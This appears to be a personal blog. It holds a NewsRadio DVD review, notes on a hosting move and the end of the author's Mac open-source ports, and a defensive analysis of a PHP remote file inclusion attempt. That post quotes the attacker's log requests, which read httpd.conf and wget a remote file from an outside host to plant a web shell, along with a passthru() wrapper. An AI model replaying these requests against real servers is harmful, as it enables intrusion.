NewsRadio was probably the funniest show I’ve ever enjoyed. The timing, cynicism, and internal struggles made it so… well, in a word: brilliant.

The (albient dated, but by design) cultural references from Soylent Green to Flowers for Algernon only made the witty dialog all the more relevant, somehow. You see that these young adults are entering their careeer paths, and still have (at least most of) their personalities intact. If you don’t like thinking, or a bit of slapstick humor, you won’t enjoy NewsRadio – however, even my mother has learned to enjoy the show – so much that she “borrowed” my DVDs (which I doubt I’ll have returned..) Paul Simms created magic.. in the time of grunge music.

Season 3 is finally on DVD. In this season, the characters have really grown into their personas, and the story lines are fresh, and exciting. The commentaries are generally a bit weak, but still quite enjoyable – I only wish they’d tell us what the ‘secret lyrics’ are that they made to go with Mike Post’s theme music! (Ok, I’d also pay $20 more per DVD set if there was no laugh track.. that annoys the heck out of me.)

In related news, I’ve purchased a WNYX mug. Yes, I love this show; nearly as much as these folks seem to.

While browsing my logs today, I discovered someone attempting to exploit PHP’s fopen() support for URLs , This specific form of expoit dates back to at least 2003.

The relevent information (from the cached page above – it doesn’t work here, so all you’d see was the first negated attempt):

“GET
/index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?
&chdir=/usr/local/apache/conf&cmd=cat%20httpd.conf HTTP/1.1”

“GET
/index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?
&chdir=/somewhere/writeable&cmd=wget%20http://www.havenard.net/havenard/4843term.txt HTTP/1.1”

“GET
/index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?
&chdir=/somewhere/writeable&cmd=mv%204843term.txt%20terminal.php HTTP/1.1”

So, I looked at the script that was being linked to (as a text file, from a Geocities site; which still has ‘blocking’ disabled for text files – for some legacy reason). Below follows some of the code:

if (!empty($cmd)) { @passthru(”$cmd 2>&1”); $output = ob_get_contents(); if (!empty($output)) echo str_replace(”>”, ”>”, str_replace(”<”, ”<”, $output)); }

As you can see, this script is essentially just a wrapper for exec, using the syntax of a few parameters passed within $_GET[“cmd”].. only, not quite that smart.

It’s incredibly simple, old, and, well, sadly quite effective – many people still don’t secure their site, and blindly write code which works as the following:

if ( ! $var ) $var = “var”;
require(”$var.html”);

The above code is beyond bad. For one, it doesn’t define a local path, which could easily be fixed with:

require(”./$var.html”); (although, I still don’t agree with this method – and this STILL isn’t failsafe.)

I hate global variables, but once you parse your config, you can read the whole thing into an array of a single variable, which you don’t expose – except where you have to.

This is also pretty messy: It allows you to only access one global variable; however, it discloses everything in it’s array, which I consider to be bogus.

Protip: If you don’t need to open files from an external site (which you shouldn’t need to do.. and if you do, use sockets, or a PEAR library), turn off url access in fopen(). This is configurable in php.ini.

I’ve moved from my hosting with ICDSoft in China to ICDSoft’s USA colocation.

Things were updated in nameservice by myself in parallel with the move; anyone who cached (viewed) my page within the last few hours may have up to 48 hours until it updates on their ISP’s nameserver, but there IS a forward in place to the new location with an alternative name – CSS will be broken, and the site will be ugly, but it will still be functional.

Thanks for your swift, excellent service, ICDSoft .

[Update: Everything should be seeing the ‘new’ host, and yes, it may appear ‘faster’.]

Please pardon the dust; I’ve moved out of my old software base into an entirely new, redesigned (if not prettier) system.

I have converted, and imported all of my existing articles, but there has been no easy way to (re)classify them, as they’re entirely incompatible data types. I’ve manually updated the last fifty articles, but note that browsing by article type is not yet reflective of actual content.

As I am no longer actively maintaining open source software, the old posts will eventually be reclassified as legacy and deprecated; but left for the annals of time, and those searching for information I’ve uncovered in the past.

Yes, you’ve read that right. I will no longer offer Mac OS X ports, builds, or other assistance with my own open source based efforts.

This has been a difficult decision, however, I can no longer afford the time or bandwidth once dedicated to these projects.

If you wish to take over as maintainer of any of my existing code, please contact me, and the original authors (where applicable); I’ll be more than happy to offer my existing build structure with all dependencies, and when necessary, my personal build notes and GNU Patch unified diffs.

I have notified the authors of my ported software, and will continue to host this unsupported software through March, 2006.

Update: MKVToolNix, and OGMTools have found a new home. DOSBox is moving back in-house, and the Mac port of Bliss shall pass on with my silly little ‘speak’ utility.